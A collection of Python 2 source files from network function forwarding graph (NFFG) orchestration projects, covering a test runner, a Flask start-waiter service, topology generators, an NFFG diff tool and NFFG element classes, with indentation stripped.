errorOp = True
if totalInternal>0:
print "\033[31;1m Test Failed: There were %d internal errors \033[39;0m" % totalErrors
errorOp = True
if warningHighWaterMarkExceeded:
print "\033[31;1m Test Failed: Warning High Water Mark of %d Exceeded, \033[39;0m" % warningHighWaterMark
print "\033[31;1m New Warnings were introduced! \033[39;0m"
errorOp = True
if errorOp == False:
print "\033[39;1m Test Passed! \033[39;0m"
print "-"*tabWid
print "\n"
# ----------------------------------------------------------------------------|
if __name__ == '__main__':
print "Testing Yangdump for various formats"
InitialiseOutputDir()
results = TestYang()
DisplayResults( results )
```
#### File: 5GExchange/escape/start_waiter.py
```python
import hashlib
import pprint
from argparse import ArgumentParser
import yaml
from flask import Flask, request, Response
from flask_httpauth import HTTPBasicAuth
ESC_DEF_CFG = "escape-config.yaml"
DEFAULT_PORT = 8888
parser = ArgumentParser(description="Restart waiter",
add_help=True)
parser.add_argument("-c", "--config", default=ESC_DEF_CFG,
help="configuration for REST-API (default: %s)" %
ESC_DEF_CFG)
args, unknown = parser.parse_known_args()
CONFIG = {}
with open(ESC_DEF_CFG) as f:
esc_cfg = yaml.safe_load(f)
for key in ('host', 'port', 'auth_user', 'auth_secret', 'prefix'):
CONFIG[key] = esc_cfg['REST-API'][key]
if args.config:
with open(args.config) as f:
esc_cfg = yaml.safe_load(f)
for key in ('host', 'port', 'auth_user', 'auth_secret', 'prefix'):
try:
CONFIG[key] = esc_cfg['REST-API'][key]
except KeyError:
pass
print "Parsed configuration:"
pprint.pprint(CONFIG, indent=2)
app = Flask(__name__)
auth = HTTPBasicAuth()
@auth.hash_password
def hash_passwd (passwd):
return hashlib.md5(passwd).hexdigest()
@auth.get_password
def get_passwd (username):
if username == CONFIG['auth_user']:
return CONFIG['auth_secret']
print "Invalid username!"
@app.route("/%s/admin/start" % CONFIG['prefix'], methods=['GET', 'POST'])
@auth.login_required
def wait_for_exit ():
print "Authenticated!"
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func is None:
raise RuntimeError('Not running with the Werkzeug Server')
else:
shutdown_func()
return Response("START accepted.\n")
if __name__ == "__main__":
try:
print "Waiting for start command..."
app.run(host=CONFIG['host'], port=CONFIG['port'])
except KeyboardInterrupt:
pass
print "Exit"
```
#### File: testframework/generator/generator.py
```python
from functools import partial
import e2e_reqs_for_testframework
import networkx_nffg_generator
import sg_generator
DEFAULT_SEED = 0
eight_loop_requests = partial(sg_generator.get_8loop_request,
abc_nf_types_len=10,
seed=DEFAULT_SEED,
eightloops=1)
complex_e2e_reqs = partial(e2e_reqs_for_testframework.main,
loops=False,
vnf_sharing=0.0,
seed=DEFAULT_SEED,
multiple_scs=False,
use_saps_once=False,
max_sc_count=2,
chain_maxlen=8,
max_cpu=4,
max_mem=1600,
max_storage=3,
max_bw=7,
max_e2e_lat_multiplier=20,
min_e2e_lat_multiplier=1.1)
networkx_resource_generator = partial(networkx_nffg_generator
.networkx_resource_generator,
seed=DEFAULT_SEED,
max_cpu=40, max_mem=16000,
max_storage=30, max_link_bw=70,
abc_nf_types_len=10,
supported_nf_cnt=6, max_link_delay=1,
sap_cnt=10)
balanced_tree_request = partial(sg_generator.get_balanced_tree, r=2, h=3,
seed=DEFAULT_SEED,
max_cpu=4, max_mem=1600,
max_storage=3,
max_link_bw=5,
min_link_delay=2,
abc_nf_types_len=10,
max_link_delay=4)
def networkx_request_generator (gen_func, seed=0, **kwargs):
"""
Chooses a built-in NetworkX topology generator which creates
request graph NFFG.
"""
return networkx_nffg_generator.networkx_request_generator(gen_func, seed=0,
**kwargs)
```
#### File: test/testframework/runner.py
```python
import copy
import importlib
import logging
import os
import sys
import threading
from collections import Iterable
import pexpect
import yaml
from yaml.error import YAMLError
log = logging.getLogger()
class Tee(object):
"""
Inspired by the bash command: tee
tee - read from standard input and write to standard output and files
"""
def __init__ (self, filename):
super(Tee, self).__init__()
self.file = open(filename, mode="w", buffering=0)
self.stdout = sys.stdout
sys.stdout = self
def __del__ (self):
sys.stdout = self.stdout
self.file.close()
def write (self, data):
self.file.write(data)
self.stdout.write(data)
def __enter__ (self):
return self
def __exit__ (self, exc_type, exc_val, exc_tb):
self.__del__()
class EscapeRunResult():
"""
Container class for storing the result of the test run.
"""
def __init__ (self, output=None, exception=None):
self.log_output = output
self.exception = exception
def was_error (self):
return self.exception is not None
def __iter__ (self):
return iter(self.log_output)
class CommandRunner(object):
"""
Main runner class which capable of running the test script and kill the
process explicitly or based on the timeout value.
"""
KILL_TIMEOUT = 60
def __init__ (self, cmd, cwd=None, kill_timeout=None, output_stream=None):
self._command = self.__evaluate_cmd(cmd)
self._cwd = cwd if cwd else os.path.dirname(__file__)
self.kill_timeout = kill_timeout if kill_timeout else self.KILL_TIMEOUT
self.output_stream = output_stream
self._process = None
self.__killed = False
def __str__ (self):
return "%s(cmd: %s, timeout: %s)" % (
self.__class__.__name__, self._command, self.kill_timeout)
@property
def is_killed (self):
return self.__killed
@property
def is_alive (self):
return self._process and self._process.isalive()
@staticmethod
def __evaluate_cmd (cmd):
"""
Split command to list for pexpect.
:param cmd: str or list
:rtype: list[str]
"""
if isinstance(cmd, basestring):
return cmd.split(' ')
elif isinstance(cmd, Iterable):
return list(cmd)
else:
return None
def execute (self):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e)
self.kill_process()
def kill_process (self):
"""
Kill the process and call the optional hook function.
"""
log.debug("Kill process...")
self.stop()
self.__killed = True
if self.is_alive:
self._process.terminate(force=True)
def stop (self):
"""
Stop the process.
:return: None
"""
log.debug("Terminate program under test: %s" % self)
if self._process:
self._process.sendcontrol('c')
if self.is_alive:
self._process.terminate()
def get_process_output_stream (self):
"""
:return: Return with the process buffer.
"""
return self._process.before if self._process.before else ""
def clone (self):
return copy.deepcopy(self)
def cleanup (self):
log.debug("Cleanup %s..." % self.__class__.__name__)
self._process = None
self.__killed = False
self.__killed = False
pass
class ESCAPECommandRunner(CommandRunner):
"""
Extended CommandRunner class for ESCAPE.
Use threading.Event for signalling ESCAPE is up.
"""
ESC_PARAM_QUIT = "--quit"
ESC_PARAM_SERVICE = "--service"
def __init__ (self, *args, **kwargs):
super(ESCAPECommandRunner, self).__init__(*args, **kwargs)
self.__ready = threading.Event()
self.timeouted = False
@property
def timeout_exceeded (self):
return self.timeouted
def setup_verbose_logging (self):
log.debug("Detect VERBOSE mode --> Add more 'debug' flag")
self._command.extend(('--debug',) * 2)
def setup_standalone_mode (self):
log.debug("Detected standalone mode --> Disable timeout")
self.kill_timeout = None
log.debug("Remove quit mode, add ROS-API")
self._command.extend(("++quit", "--rosapi"))
def execute (self, wait_for_up=True):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
log.debug("\nStart program under test...")
log.debug(self._command)
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
if wait_for_up:
self._process.expect(pattern="ESCAPEv2 is up")
self.__ready.set()
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
self.timeouted = True
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e.message)
log.debug("\n\nError details:\n%s" % self._process.before)
self.kill_process()
def test (self, timeout=CommandRunner.KILL_TIMEOUT):
"""
Start a presumably simple process and test if the process is executed
successfully within the timeout interval or been killed.
:param timeout: use the given timeout instead of the default kill timeout
:type timeout: int
:return: the process is stopped successfully
:rtype: bool
"""
try:
proc = pexpect.spawn(self._command[0],
args=self._command[1:],
cwd=self._cwd,
timeout=timeout)
proc.expect(pexpect.EOF)
return True
except pexpect.ExceptionPexpect:
return False
def wait_for_ready (self):
log.debug("Waiting for ESCAPE...")
self.__ready.wait(timeout=self.kill_timeout)
log.debug("ESCAPE is up! ")
def kill_process (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).kill_process()
def stop (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).stop()
def reset(self):
log.debug("Reset %s status..." % self.__class__.__name__)
self.timeouted = False
self.__ready.clear()
class RunnableTestCaseInfo(object):
"""
Container class for storing the relevant information and config values of a
test case.
"""
CONFIG_FILE_NAME = "test-config.yaml"
CONFIG_CONTAINER_NAME = "test"
RUNNER_SCRIPT_NAME = "run.sh"
README_FILE_NAME = "README.txt"
def __init__ (self, case_path):
# Removing trailing slash
self.__case_path = os.path.normpath(case_path)
self.sub_name = None
log.debug("Reading testcase cfg from: %s" % self.full_testcase_path)
@property
def testcase_dir_name (self):
"""
:return: directory name of the test case
:rtype: str
"""
return os.path.basename(self.__case_path)
@property
def name (self):
if self.sub_name is not None:
return "%s-%s" % (self.testcase_dir_name, self.sub_name)
else:
return self.testcase_dir_name
@property
def full_testcase_path (self):
"""
:return: absolute path of the test case directory.
:rtype: str
"""
return self.__case_path
@property
def test_command (self):
"""
:return: absolute command path of the test case runner script.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.RUNNER_SCRIPT_NAME)
@property
def config_file_name (self):
"""
:return: absolute path of the test case config file.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.CONFIG_FILE_NAME)
def readme (self):
"""
:return: load the README file
:rtype: str
"""
with open(os.path.join(self.full_testcase_path,
self.README_FILE_NAME)) as f:
readme = f.read()
return readme if readme else ""
def load_test_case_class (self):
"""
:return: Return the TestCase class and it's parameters defined in the
test case config file
:rtype: tuple(object, dict)
"""
test_args = {}
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
if self.CONFIG_CONTAINER_NAME in config:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
try:
m = test_args.pop('module')
c = test_args.pop('class')
return getattr(importlib.import_module(m), c), test_args
except (KeyError, ImportError):
pass
return None, test_args
def load_config (self):
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
try:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
return test_args
except KeyError:
pass
return None
def __repr__ (self):
return "RunnableTestCase [%s]" % self.testcase_dir_name
def clone (self):
return copy.deepcopy(self)
``` |
{
"source": "5GExchange/nffg",
"score": 3
} |
#### File: 5GExchange/nffg/nffg_diff.py
```python
import argparse
from nffg import NFFGToolBox, NFFG
def _calculate_diffs (old_path, new_path):
"""
Calculate and print the difference of the two :class:`NFFG` given by it"s path.
:param old_path: file path of the original NFFG
:type old_path: :class:`NFFG`
:param new_path: file path of the modified NFFG
:type new_path: :class:`NFFG`
:return: None
"""
print "Calculate the difference NFFGs..."
old = NFFG.parse_from_file(old_path)
NFFGToolBox.recreate_all_sghops(nffg=old)
new = NFFG.parse_from_file(new_path)
NFFGToolBox.recreate_all_sghops(nffg=new)
add_nffg, del_nffg = NFFGToolBox.generate_difference_of_nffgs(old=old,
new=new,
ignore_infras=True)
print "\nADD NFFG:"
print add_nffg.dump()
print "\nDEL NFFG:"
print del_nffg.dump()
if __name__ == "__main__":
# Implement parser options
parser = argparse.ArgumentParser(description="Calculate differences of NFFGs",
add_help=True)
parser.add_argument("old", action="store", type=str, help="path for old NFFG")
parser.add_argument("new", action="store", type=str, help="path for new NFFG")
# Parsing arguments
args = parser.parse_args()
_calculate_diffs(old_path=args.old, new_path=args.new)
```
#### File: 5GExchange/nffg/nffg_elements.py
```python
import json
import uuid
from collections import Iterable, OrderedDict
from itertools import chain
################################################################################
# ---------- BASE classes of NFFG elements -------------------
################################################################################
class Persistable(object):
"""
Define general persist function for the whole NFFG structure.
"""
__slots__ = ()
def persist (self):
"""
Common function to persist the actual element into a plain text format.
:return: generated empty object fit to JSON
:rtype: dict
"""
return OrderedDict()
def load (self, data, *args, **kwargs):
"""
Common function to fill self with data from JSON data.
:raise: :any:`exceptions.NotImplementedError`
:param data: object structure in JSON
:return: self
"""
pass
@classmethod
def parse (cls, data, *args, **kwargs):
"""
Common function to parse the given JSON object structure as the actual NF-FG
entity type and return a newly created object.
:param data: raw JSON object structure
:type data: object
:return: parsed data as the entity type
:rtype: :any:`Persistable`
"""
return cls().load(data, *args, **kwargs)
def copy (self):
"""
Return the copy of the object. This copy function is meant to use when a new
``NFFG`` object structure is created. It can handles the references pointed
to internal NFFG element in order to avoid unnecessary deep copies. These
references are always None in the copied object which are overwritten by
adder functions in every case.
:return: copied object
:rtype: :any:`Element`
"""
from copy import deepcopy
return deepcopy(self)
class Element(Persistable):
"""
Main base class for NF-FG elements with unique id.
Contains the common functionality.
"""
# Operation constants
OP_CREATE = "create"
OP_REPLACE = "replace"
OP_MERGE = "merge"
OP_REMOVE = "remove"
OP_DELETE = "delete"
# Status constants
STATUS_INIT = "INITIALIZED"
STATUS_PENDING = "PENDING"
STATUS_DEPLOY = "DEPLOYED"
STATUS_RUN = "RUNNING"
STATUS_STOP = "STOPPED"
STATUS_FAIL = "FAILED"
__slots__ = ('id', 'type', 'operation', 'status')
def __init__ (self, id=None, type="ELEMENT", operation=None, status=None):
"""
Init.
:param id: optional identification (generated by default)
:type id: str or int
:param type: explicit object type both for nodes and edges
:type type: str
:return: None
"""
super(Element, self).__init__()
self.id = id if id is not None else self.generate_unique_id()
self.type = type
self.operation = operation
self.status = status
@staticmethod
def generate_unique_id ():
"""
Generate a unique id for the object based on uuid module: :rfc:`4122`.
:return: unique id
:rtype: str
"""
return str(uuid.uuid1())
def regenerate_id (self):
"""
Regenerate and set id. Useful for object copy.
:return: new id
:rtype: str
"""
self.id = self.generate_unique_id()
return self.id
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
# Need to override
element = super(Element, self).persist()
element['id'] = self.id
if self.operation is not None:
element["operation"] = self.operation
if self.status is not None:
element["status"] = self.status
return element
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
self.id = data['id']
super(Element, self).load(data=data)
self.operation = data.get("operation") # optional
self.status = data.get("status") # optional
return self
def dump (self):
"""
Dump the Element in a pretty format for debugging.
:return: Element in JSON format
:rtype: str
"""
return json.dumps(self.persist(), indent=2, sort_keys=False)
##############################################################################
# dict specific functions
##############################################################################
def __getitem__ (self, item):
"""
Return the attribute of the element given by ``item``.
:param item: attribute name
:type item: str or int
:return: attribute
:rtype: object
"""
if hasattr(self, item):
return getattr(self, item)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, item))
def __setitem__ (self, key, value):
"""
Set the attribute given by ``key`` with ``value``:
:param key: attribute name
:type key: str or int
:param value: new value
:type value: object
:return: new value
:rtype: object
"""
if hasattr(self, key):
return setattr(self, key, value)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, key))
def __contains__ (self, item):
"""
Return true if the given ``item`` is exist.
:param item: searched attribute name
:type item: str or int
:return: given item is exist or not
:rtype: bool
"""
return hasattr(self, item)
def get (self, item, default=None):
"""
Return with the attribute given by ``item``, else ``default``.
:param item: searched attribute name
:type item: str
:param default: default value
:type default: object
:return: found attribute or default
:rtype: object
"""
try:
return self[item]
except KeyError:
return default
def setdefault (self, key, default=None):
"""
Set the attribute given by ``key``. Use the ``default`` value is it is
not given.
:param key: attribute name
:type key: str or int
:param default: default value
:type default: object
:return: None
"""
if key not in self:
self[key] = default
def clear (self):
"""
Overrided for safety reasons.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError("This standard dict functions is not supported by NFFG!")
def update (self, dict2):
"""
Overrided for safety reasons.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError(
"This standard dict functions is not supported by NFFG! self: %s dict2: "
"%s" % (self, dict2))
class L3Address(Element):
"""
Wrapper class for storing L3 address values.
"""
__slots__ = ('name', 'configure', 'client', 'requested', 'provided')
def __init__ (self, id, name=None, configure=None, client=None,
requested=None, provided=None):
"""
Init.
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param configure: request address
:type configure: bool
:param client: client of the address request
:type client: str
:param requested: requested IP
:type requested: str
:param provided: provided IP
:type provided: str
:return: None
"""
super(L3Address, self).__init__(id=id, type="L3ADDRESS")
self.name = name
self.configure = configure
self.client = client
self.requested = requested
self.provided = provided
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(L3Address, self).load(data=data)
self.name = data.get('name')
self.configure = data.get('configure')
self.requested = data.get('requested')
self.provided = data.get('provided')
return self
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
l3 = super(L3Address, self).persist()
if self.name is not None:
l3['name'] = self.name
if self.configure is not None:
l3['configure'] = self.configure
if self.client is not None:
l3['client'] = self.client
if self.requested is not None:
l3['requested'] = self.requested
if self.provided is not None:
l3['provided'] = self.provided
return l3
class L3AddressContainer(Persistable):
"""
Container class for storing L3 address data.
"""
__slots__ = ('container',)
def __init__ (self, container=None):
"""
Init.
:param container: optional container for L3 addresses.
:type container: collection.Iterable
:return: None
"""
super(L3AddressContainer, self).__init__()
self.container = container if container is not None else []
def __getitem__ (self, id):
"""
Return with the :any:`L3Address` given by ``id``.
:param id: L3 address id
:type id: str or int
:return: L3 address
:rtype: :any:`L3Address`
"""
for l3 in self.container:
if l3.id == id:
return l3
raise KeyError("L3 address with id: %s is not defined!" % id)
def __iter__ (self):
"""
Return with an iterator over the container.
:return: iterator
:rtype: collection.Iterable
"""
return iter(self.container)
def __len__ (self):
"""
Return the number of stored :any:`L3Address`.
:return: number of addresses
:rtype: int
"""
return len(self.container)
def __contains__ (self, item):
"""
Return True if address given by ``id`` is exist in the container.
:param item: address object
:type: :any:`L3Address`
:return: found address or not
:rtype: bool
"""
if not isinstance(item, L3Address):
raise RuntimeError(
"L3AddressContainer's operator \"in\" works only with L3Address "
"objects (and not ID-s!)")
return item in self.container
def append (self, item):
"""
Add a new address to the container.
:param item: address object
:type: :any:`L3Address`
:return: added address
:rtype: :any:`L3Address`
"""
self.container.append(item)
return item
def remove (self, item):
"""
Remove L3 address from container.
:param item: address object
:type: :any:`L3Address`
:return: removed address
:rtype: :any:`L3Address`
"""
return self.container.remove(item)
def clear (self):
"""
Remove all the stored address from container.
:return: None
"""
del self.container[:]
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return str(self.container)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return str(self)
def add_l3address (self, id, name=None, configure=None, client=None,
requested=None, provided=None):
"""
Add a new address to the container based on given :any:`L3Address`
attributes.
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param configure: request address
:type configure: bool
:param client: client of the address request
:type client: str
:param requested: requested IP
:type requested: str
:param provided: provided IP
:type provided: str
:return: None
"""
self.container.append(
L3Address(id, name=name, configure=configure, client=client,
requested=requested, provided=provided))
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
return [l3.persist() for l3 in self.container]
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
for item in data:
self.add_l3address(id=item['id'], name=item.get('name'),
configure=item.get('configure'),
client=item.get('client'),
requested=item.get('requested'),
provided=item.get('provided'))
class Port(Element):
"""
Class for storing a port of an NF.
"""
# Port type
TYPE = "PORT"
"""Port type"""
ROLE_CONSUMER = "consumer"
ROLE_PROVIDER = "provider"
ROLE_EXTERNAL = "EXTERNAL"
__slots__ = ('__node', 'properties', 'metadata', 'name', 'sap', 'capability',
'technology', 'role', 'delay', 'bandwidth', 'cost', 'qos',
'controller', 'orchestrator', 'l2', 'l3', 'l4')
def __init__ (self, node, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, role=None, delay=None,
bandwidth=None, cost=None, qos=None, controller=None,
orchestrator=None, l2=None, l4=None, metadata=None):
"""
Init.
:param node: container node
:type node: :any:`Node`
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param name: optional name
:type name: str
:param name: optional capabilities
:type name: str
:param sap: inter-domain SAP identifier
:type sap: str
:param technology: supported technologies
:type technology: str
:param delay: delay
:type delay: float
:param bandwidth: bandwidth
:type bandwidth: float
:param cost: cost
:type cost: str
:param qos: traffic QoS class
:type qos: str
:param controller: controller URL
:type controller: str
:param orchestrator: orchestrator URL
:type orchestrator: str
:param l2: l2 address
:param l2: str
:param l4: l4 fields
:type l4: str
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(Port, self).__init__(id=id, type=self.TYPE)
if not isinstance(node, Node):
raise RuntimeError("Port's container node must be derived from Node!")
self.__node = node
# Set properties list according to given param type
self.properties = OrderedDict(properties if properties else {})
self.metadata = OrderedDict(metadata if metadata else {})
# Virtualizer-related data
self.name = name
self.sap = sap
self.capability = capability
# sap_data
self.technology = technology
# sap_data/role
self.role = role
# sap_data/resources
self.delay = delay
self.bandwidth = bandwidth
self.cost = cost
self.qos = qos
# control
self.controller = controller
self.orchestrator = orchestrator
# addresses
self.l2 = l2
self.l3 = L3AddressContainer()
self.l4 = l4
@property
def node (self):
"""
Return with the container reference.
:return: container reference
:rtype: :any:`Persistable`
"""
return self.__node
def copy (self):
"""
Skip container ``node`` deepcopy in case the :any:`Port` object is copied
directly. Deepcopy called on an upper object has already cloned the
container node when it gets to a Port object and it will skip the re-cloning
due to its internal memoization feature.
:return: copied object
:rtype: :any:`Port`
"""
tmp, self.__node = self.__node, None
clone = super(Port, self).copy()
self.__node = tmp
return clone
@node.deleter
def node (self):
del self.__node
def add_property (self, property, value):
"""
Add a property to the :any:`Port`.
:param property: property
:type property: str
:param value: property value
:type value: str
:return: the Port object to allow function chaining
:rtype: :any:`Port`
"""
self.properties[property] = value
return self
def has_property (self, property):
"""
Return True if :any:`Port` has a property with given `property`.
:param property: property
:type property: str
:return: has a property with given name or not
:rtype: bool
"""
return property in self.properties
def del_property (self, property=None):
"""
Remove the property from the :any:`Port`. If no property is given all the
properties will be removed from the :any:`Port`.
:param property: property name
:type property: str
:return: removed property or None
:rtype: str or None
"""
if property is None:
self.properties.clear()
else:
return self.properties.pop(property, None)
def get_property (self, property):
"""
Return the value of property.
:param property: property
:type property: str
:return: the value of the property
:rtype: str
"""
return self.properties.get(property)
def add_metadata (self, name, value):
"""
Add metadata with the given `name`.
:param name: metadata name
:type name: str
:param value: metadata value
:type value: str
:return: the :any:`Port` object to allow function chaining
:rtype: :any:`Port`
"""
self.metadata[name] = value
return self
def has_metadata (self, name):
"""
Return True if the :any:`Port` has a metadata with the given `name`.
:param name: metadata name
:type name: str
:return: has metadata with given name or not
:rtype: bool
"""
return name in self.metadata
def del_metadata (self, name=None):
"""
Remove the metadata from the :any:`Port`. If no metadata is given all the
metadata will be removed.
:param name: name of the metadata
:type name: str
:return: removed metadata or None
:rtype: str or None
"""
if name is None:
self.metadata.clear()
else:
return self.metadata.pop(name, None)
def get_metadata (self, name):
"""
Return the value of metadata.
:param name: name of the metadata
:type name: str
:return: metadata value
:rtype: str
"""
return self.metadata.get(name)
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
port = super(Port, self).persist()
if self.properties:
port["property"] = self.properties.copy()
if self.name is not None:
port['name'] = self.name
if self.sap is not None:
port['sap'] = self.sap
if self.capability is not None:
port['capability'] = self.capability
if any(v is not None for v in (self.technology, self.role, self.delay,
self.bandwidth, self.cost)):
port['sap_data'] = {}
if self.technology is not None:
port['sap_data']['technology'] = self.technology
if self.role is not None:
port['sap_data']['role'] = self.role
if any(v is not None for v in (self.delay, self.bandwidth, self.cost)):
port['sap_data']['resources'] = {}
if self.delay is not None:
port['sap_data']['resources']['delay'] = self.delay
if self.bandwidth is not None:
port['sap_data']['resources']['bandwidth'] = self.bandwidth
if self.cost is not None:
port['sap_data']['resources']['cost'] = self.cost
if self.qos is not None:
port['sap_data']['resources']['qos'] = self.qos
if any(v is not None for v in (self.controller, self.orchestrator)):
port['control'] = {}
if self.controller is not None:
port['control']['controller'] = self.controller
if self.orchestrator is not None:
port['control']['orchestrator'] = self.orchestrator
if any(v is not None for v in
(self.l2, self.l4, True if self.l3 else None)):
port['addresses'] = {}
if self.l2 is not None:
port['addresses']['l2'] = self.l2
if self.l4 is not None:
port['addresses']['l4'] = self.l4
if len(self.l3):
port['addresses']['l3'] = self.l3.persist()
if self.metadata:
port["metadata"] = self.metadata.copy()
return port
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Port, self).load(data=data)
self.properties = OrderedDict(data.get('property', ()))
self.sap = data.get('sap')
self.name = data.get('name')
self.capability = data.get('capability')
if 'sap_data' in data:
self.technology = data['sap_data'].get('technology')
self.role = data['sap_data'].get('role')
if 'resources' in data['sap_data']:
self.delay = data['sap_data']['resources'].get('delay')
self.bandwidth = data['sap_data']['resources'].get('bandwidth')
self.cost = data['sap_data']['resources'].get('cost')
self.qos = data['sap_data']['resources'].get('qos')
else:
self.technology = self.delay = self.bandwidth = self.cost = None
if 'control' in data:
self.controller = data['control'].get('controller')
self.orchestrator = data['control'].get('orchestrator')
else:
self.controller = self.orchestrator = None
if 'addresses' in data:
self.l2 = data['addresses'].get('l2')
self.l3.load(data=data['addresses'].get('l3', ()))
self.l4 = data['addresses'].get('l4')
else:
self.l2 = self.l4 = None
self.metadata = OrderedDict(data.get('metadata', ()))
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "%s(node: %s, id: %s)" % (
self.__class__.__name__, self.node.id, self.id)
class PortContainer(Persistable):
"""
Basic container class for ports.
Implements a Container-like behavior for getting a Port with id:
>>> cont = PortContainer()
>>> ...
>>> cont["port_id"]
"""
__slots__ = ('container',)
def __init__ (self, container=None):
"""
Init.
:param container: use given container for init
:type container: :any:`collections.Container`
"""
self.container = container if container is not None else []
def __getitem__ (self, id):
"""
Return with the :any:`Port` given by ``id``.
:param id: port id
:type id: str or int
:return: port object
:rtype: :any:`Port`
"""
for port in self.container:
if port.id == id:
return port
raise KeyError("Port with id: %s is not defined in: %s!"
% (id, [p.id for p in self.container]))
def __iter__ (self):
"""
Return with an iterator over the container.
:return: iterator
:rtype: collection.Iterable
"""
return iter(self.container)
def __len__ (self):
"""
Return the number of stored :any:`Port`.
:return: number of ports
:rtype: int
"""
return len(self.container)
def __contains__ (self, item):
"""
Return True if port given by ``id`` is exist in the container.
:param item: port object
:type: :any:`Port`
:return: found port or not
:rtype: bool
"""
# this type checking is important because with Port ID input the function
# would silently return False!
if isinstance(item, Port):
return item in self.container
else:
return item in (p.id for p in self.container)
@property
def flowrules (self):
"""
Return with an iterator over the flowrules sored in the ports.
:return: iterator of flowrules
:rtype: collections.Iterator
"""
return chain(*[port.flowrules for port in self.container])
def append (self, item):
"""
Add new port object to the container.
:param item: port object
:type item: :any:`Port`
:return: added object
:rtype: :any:`Port`
"""
self.container.append(item)
return item
def remove (self, item):
"""
Remove port object from the container.
:param item: port object
:type item: :any:`Port`
:return: None
"""
try:
return self.container.remove(item)
except ValueError:
return
def clear (self):
"""
Remove all the stored objects.
:return: None
"""
del self.container[:]
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return str(self.container)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return str(self)
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
return [port.persist() for port in self.container]
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
pass
class Constraints(Persistable):
"""
Container class for constraints.
"""
__slots__ = ('affinity', 'antiaffinity', 'variable', 'constraint',
'restorability')
def __init__ (self):
"""
Init.
"""
super(Constraints, self).__init__()
self.affinity = OrderedDict()
self.antiaffinity = OrderedDict()
self.variable = OrderedDict()
self.constraint = OrderedDict()
self.restorability = None
def add_affinity (self, id, value):
"""
Set affinity value.
:param id: unique ID
:type id: str or int
:param value: new value
:type value: str or int
:return: new value
:rtype: str or int
"""
self.affinity[id] = value
return value
def has_affinity (self, id):
"""
Return True if affinity value with id is exist.
:param id: unique ID
:type id: str or int
:return: value exits or not
:rtype: bool
"""
return id in self.affinity
def del_affinity (self, id):
"""
Remove affinity value with given id.
:param id: unique ID
:type id: str or int
:return: removed value
:rtype: str or int
"""
return self.affinity.pop(id, None)
def add_antiaffinity (self, id, value):
"""
Set antiaffinity value.
:param id: unique ID
:type id: str or int
:param value: new value
:type value: str or int
:return: new value
:rtype: str or int
"""
self.antiaffinity[id] = value
return value
def has_antiaffinity (self, id):
"""
Return True if antiaffinity value with id is exist.
:param id: unique ID
:type id: str or int
:return: value exits or not
:rtype: bool
"""
return id in self.antiaffinity
def del_antiaffinity (self, id):
"""
Remove antiaffinity value with given id.
:param id: unique ID
:type id: str or int
:return: removed value
:rtype: str or int
"""
return self.antiaffinity.pop(id, None)
def add_variable (self, key, id):
"""
Set variable value.
:param key: unique key
:type key: str or int
:param id: new value
:type id: str or int
:return: new value
:rtype: str or int
"""
self.variable[key] = id
return id
def has_variable (self, key):
"""
Return True if variable value with key is exist.
:param key: unique key
:type key: str or int
:return: value exits or not
:rtype: bool
"""
return key in self.variable
def del_variable (self, key):
"""
Remove variable value with given key.
:param key: unique key
:type key: str or int
:return: removed value
:rtype: str or int
"""
return self.variable.pop(key, None)
